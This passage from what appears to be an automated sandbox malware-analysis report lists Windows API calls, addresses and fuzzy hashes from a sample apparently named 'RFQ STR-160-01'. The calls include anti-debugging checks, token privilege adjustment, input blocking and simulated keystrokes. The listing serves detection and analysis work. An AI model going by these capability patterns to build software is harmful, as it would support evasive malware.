              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorEventFileInternetLastRead
              • String ID:
              • API String ID: 234945975-0
              • Opcode ID: 947f388146d913de3c9d0f39ed6f86c1d0f2b671d271fc3ab0b13a8d769e2d4a
              • Instruction ID: 55235b9cbe270f95806d66052e41804ed9eb220a6c7058f934bab7dacce7a914
              • Opcode Fuzzy Hash: 947f388146d913de3c9d0f39ed6f86c1d0f2b671d271fc3ab0b13a8d769e2d4a
              • Instruction Fuzzy Hash: 4421BDB15407069BD734CF65C948BEB7BFAEF40324F20462EE646D2291E770EE059B60
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 00605CC1
              • FindNextFileW.KERNEL32(00000000,?), ref: 00605D17
              • FindClose.KERNEL32(?), ref: 00605D5F
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Find$File$CloseFirstNext
              • String ID:
              • API String ID: 3541575487-0
              • Opcode ID: 19e0813159a8812f9647633d18ed0ec735e8eee7682d93cb8bd215e51a7ab246
              • Instruction ID: a50f2247eeeb6e456c667ac6336b7c524a778b656ca5bccc80f2516b406bbfef
              • Opcode Fuzzy Hash: 19e0813159a8812f9647633d18ed0ec735e8eee7682d93cb8bd215e51a7ab246
              • Instruction Fuzzy Hash: 3F518975604A029FC718CF28C498E9ABBE5FF49324F14855EE95A8B3A1DB30ED05CF91
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 005C271A
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005C2724
              • UnhandledExceptionFilter.KERNEL32(?), ref: 005C2731
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 62d4a5997f2c79fc76564ef6c1252e0f5df2b8a6557ca60a53fb5e57b5683af6
              • Instruction ID: 6bb3a728377d4c8762588abaedc212914e6760a396c4cd5083b5cc6259e67f5f
              • Opcode Fuzzy Hash: 62d4a5997f2c79fc76564ef6c1252e0f5df2b8a6557ca60a53fb5e57b5683af6
              • Instruction Fuzzy Hash: 5831C4749012199BCB21DF68DC88BDDBBB8FF08310F5055EAE41CA62A1E7309F818F44
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 006051DA
              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00605238
              • SetErrorMode.KERNEL32(00000000), ref: 006052A1
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorMode$DiskFreeSpace
              • String ID:
              • API String ID: 1682464887-0
              • Opcode ID: 13ec666d3e6480239b1eb90a45537ffd9d0eb10bb512e627d10adb9e000a82c5
              • Instruction ID: 9bd525f16988f43d0d9d61bfca302f0b690dc9e92e6d15e8d6f8778376601de9
              • Opcode Fuzzy Hash: 13ec666d3e6480239b1eb90a45537ffd9d0eb10bb512e627d10adb9e000a82c5
              • Instruction Fuzzy Hash: 05318E35A00609DFDB00DF54D889EAEBBB5FF48314F048099E805AB3A2DB31E956CB91
              APIs
                • Part of subcall function 005AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005B0668
                • Part of subcall function 005AFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 005B0685
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
              • GetLastError.KERNEL32 ref: 005F174A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
              • String ID:
              • API String ID: 577356006-0
              • Opcode ID: 93c984bd0a9ed8e66e862ec6758060519ec55e3da48d28ee3addb752e134dd06
              • Instruction ID: 7b04f570c3c8934b2c44048459420c4594b8af83def68235908b0599e1a6515e
              • Opcode Fuzzy Hash: 93c984bd0a9ed8e66e862ec6758060519ec55e3da48d28ee3addb752e134dd06
              • Instruction Fuzzy Hash: 661194B1404709EFD718AF54DC86D6EBBB9FB44764B20852EE05657241EB70BC418B64
              APIs
              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005FD608
              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005FD645
              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005FD650
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle
              • String ID:
              • API String ID: 33631002-0
              • Opcode ID: 7f65d962a49c717928770f31af61c2b6e60fce4d3b8b81004e5cc61ac3ee5e66
              • Instruction ID: 348181f769a901bafcf32dfdcbaad7e23af6d05329ba887394bdac8a384e620c
              • Opcode Fuzzy Hash: 7f65d962a49c717928770f31af61c2b6e60fce4d3b8b81004e5cc61ac3ee5e66
              • Instruction Fuzzy Hash: C2115E75E05228BFDB208F95DC45FAFBFBDEB45B60F108115F904E7290D6704A058BA1
              APIs
              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005F168C
              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005F16A1
              • FreeSid.ADVAPI32(?), ref: 005F16B1
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AllocateCheckFreeInitializeMembershipToken
              • String ID:
              • API String ID: 3429775523-0
              • Opcode ID: 901786a6ff0ec69e49b8e108641b34c063a5a86b324ac4bc5d9541c450890777
              • Instruction ID: aa345763516f2bf17a724c433d37d6f0a1ee0fbb92385fbd39184c9d065b2e3f
              • Opcode Fuzzy Hash: 901786a6ff0ec69e49b8e108641b34c063a5a86b324ac4bc5d9541c450890777
              • Instruction Fuzzy Hash: F6F0447194030DFBDB00CFE08C89EAEBBBDFB08250F104460E500E2180E335AA448A54
              APIs
              • GetCurrentProcess.KERNEL32(005C28E9,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000,?,005C28E9), ref: 005B4D09
              • TerminateProcess.KERNEL32(00000000,?,005B4CBE,005C28E9,006588B8,0000000C,005B4E15,005C28E9,00000002,00000000,?,005C28E9), ref: 005B4D10
              • ExitProcess.KERNEL32 ref: 005B4D22
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 88541bd624af911c05e3b711a91b91e3f0bdb013e1eaa5d762d0896810d13555
              • Instruction ID: 09f114a6a810074ebe680dfcbe7d9c76be46f2ff7289fd666003e3417dde14d9
              • Opcode Fuzzy Hash: 88541bd624af911c05e3b711a91b91e3f0bdb013e1eaa5d762d0896810d13555
              • Instruction Fuzzy Hash: E0E0B631000949AFCF31AF54DD0EA983F6AFB817A5B208418FC058A123CB35ED52DF84
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: cf89535cb1ebd7eb18b0c84b18252e3d6238b531ca134a02ddb6635102359d19
              • Instruction ID: 96f153d88b7b8fb667186406d4b2e74d8542425b1e2f73d22785787d4f0fa454
              • Opcode Fuzzy Hash: cf89535cb1ebd7eb18b0c84b18252e3d6238b531ca134a02ddb6635102359d19
              • Instruction Fuzzy Hash: 5C412676500219AFCB249FF9DC88EAB7FB8FB84714F10466DF909C7180E6709D418B50
              APIs
              • GetUserNameW.ADVAPI32(?,?), ref: 005ED28C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: NameUser
              • String ID: X64
              • API String ID: 2645101109-893830106
              • Opcode ID: 5d63dd1877a667f51f14df1a71cc815a67f2d64fce2827c1b943ecc8618ef457
              • Instruction ID: ad05f61fcad792fe3d67aa2326bbc2966aabc0dfce553060aa8337f779be7a4e
              • Opcode Fuzzy Hash: 5d63dd1877a667f51f14df1a71cc815a67f2d64fce2827c1b943ecc8618ef457
              • Instruction Fuzzy Hash: F6D0C9B480111DEACB94DB90DC88DDDB77CBB04305F100551F506A2000D73495499F20
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
              • Instruction ID: a5857645912852673930e59c18ee8051b556d09a928d2a4d99e0d9a8e118c553
              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
              • Instruction Fuzzy Hash: 50020B71E001199BDF14CFA9C8806EEBFB5FF98314F25416AD819EB385D731AD418B94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: Variable is not of type 'Object'.$p#f
              • API String ID: 0-4110578496
              • Opcode ID: 23182cd64953aed7eaa1b97971e2af0cd752c67c956cee082b4a737026e24291
              • Instruction ID: fa4e09c10790a7795e45c76ba6a96040b1d24ae8272d183fdcc6d55d77e9997b
              • Opcode Fuzzy Hash: 23182cd64953aed7eaa1b97971e2af0cd752c67c956cee082b4a737026e24291
              • Instruction Fuzzy Hash: 3F32DE70900219DFDF18DF90C989AEDBFB9FF45304F644069E846AB282D775AE85CB60
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 00606918
              • FindClose.KERNEL32(00000000), ref: 00606961
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 7d69065fa6ea0d885dba44d733222287a9a0d13d4bf24623af60b85a69a05cb5
              • Instruction ID: 57a9dd47aa318bd5ec15e9bb24958371edf3b639204346af0b00630a2b5fc0e6
              • Opcode Fuzzy Hash: 7d69065fa6ea0d885dba44d733222287a9a0d13d4bf24623af60b85a69a05cb5
              • Instruction Fuzzy Hash: FA11B2316046029FC714DF29D488A1ABBE5FF89328F14C699F4698F7A2DB30EC05CB91
              APIs
              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00614891,?,?,00000035,?), ref: 006037E4
              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00614891,?,?,00000035,?), ref: 006037F4
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: 8fa19ce60be892d855fb51d984d29cd6e1bc4350670523118229420b05f7104c
              • Instruction ID: 0d0d75bc9f180d3acd734a09f95dbbec2604812038d990ac1a32df29fa5a8df8
              • Opcode Fuzzy Hash: 8fa19ce60be892d855fb51d984d29cd6e1bc4350670523118229420b05f7104c
              • Instruction Fuzzy Hash: 1DF0A0B06053296AEB2057AA8C4DFEB3AAEEFC8771F000266B509D2281D9609905C6B0
              APIs
              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 005FB25D
              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 005FB270
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: InputSendkeybd_event
              • String ID:
              • API String ID: 3536248340-0
              • Opcode ID: 6dcc32296e6ce7dba4032580b2cf4eef0485009c4e8572702c36a6f68d9e41aa
              • Instruction ID: 1d99ff43047f9313ba7da430d9928f44a96b255ab97a5f2a799b4a793d8c5369
              • Opcode Fuzzy Hash: 6dcc32296e6ce7dba4032580b2cf4eef0485009c4e8572702c36a6f68d9e41aa
              • Instruction Fuzzy Hash: 77F01D7580424DABEF159FA0C805BBE7FB5FF04315F109409F955A5191C37DC6119F94
              APIs
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005F11FC), ref: 005F10D4
              • CloseHandle.KERNEL32(?,?,005F11FC), ref: 005F10E9
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AdjustCloseHandlePrivilegesToken
              • String ID:
              • API String ID: 81990902-0
              • Opcode ID: 50cff0b03e9fb066f11ab736d209e65fda4e0e5de1dd18efc694bc128af93a25
              • Instruction ID: 61899273c8b19c78e36c938eb618fd379a62f5a6d89ec88130281cc1609964cb
              • Opcode Fuzzy Hash: 50cff0b03e9fb066f11ab736d209e65fda4e0e5de1dd18efc694bc128af93a25
              • Instruction Fuzzy Hash: A3E04F32004A01EFE7352B61FC09E7B7BEDFB04320B20882DF5A5804B1DB626CA1DB54
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005C6766,?,?,00000008,?,?,005CFEFE,00000000), ref: 005C6998
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: b417a79793c1c407beb02a706bc215d7982fbcf9e12b9bac81ff47da6855e6c7
              • Instruction ID: 4e1d55b87c6c5b6ef17ebc6aec985969a9571bcb41602c0163fc3460a8d5fdc1
              • Opcode Fuzzy Hash: b417a79793c1c407beb02a706bc215d7982fbcf9e12b9bac81ff47da6855e6c7
              • Instruction Fuzzy Hash: FCB10435610609DFDB19CF68C48AB657FE0FF45364F25865CE89ACB2A2C335EA91CB40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: 91dd183926c0db01c11546e313452ec1817240c771bbd7c7d904609325f4f20e
              • Instruction ID: 30065ac5f4e0204776881f1fdf7a92006f744e6e2d324cc6732374f6caa14e8b
              • Opcode Fuzzy Hash: 91dd183926c0db01c11546e313452ec1817240c771bbd7c7d904609325f4f20e
              • Instruction Fuzzy Hash: 55124E759002299FDF14CF59C8806BEBBB5FF49710F14859AE849EB256EB309E81CF90
              APIs
              • BlockInput.USER32(00000001), ref: 0060EABD
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: BlockInput
              • String ID:
              • API String ID: 3456056419-0
              • Opcode ID: 4c651901ff11293934ac7b20ce2f26efc6f7a2c2e7b359c05ce4a58471e17474
              • Instruction ID: 26b5411802b7cc59077aa440e44c1bacf722fcd25056b33c554818293d2214a2
              • Opcode Fuzzy Hash: 4c651901ff11293934ac7b20ce2f26efc6f7a2c2e7b359c05ce4a58471e17474
              • Instruction Fuzzy Hash: F7E01A322002159FD710EF59D808E9ABBEABF98760F008416FC49C73A1DA71A8418BA0
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005B03EE), ref: 005B09DA
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: eed593a5dd8fdef3e11c083b5b174556de67d8cabc184ff7f90232629539b391
              • Instruction ID: 500cb0f325e369c335bc9184adc2bae526c3c1f43d5cd1fda763a3e6e19c3381
              • Opcode Fuzzy Hash: eed593a5dd8fdef3e11c083b5b174556de67d8cabc184ff7f90232629539b391
              • Instruction Fuzzy Hash:
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
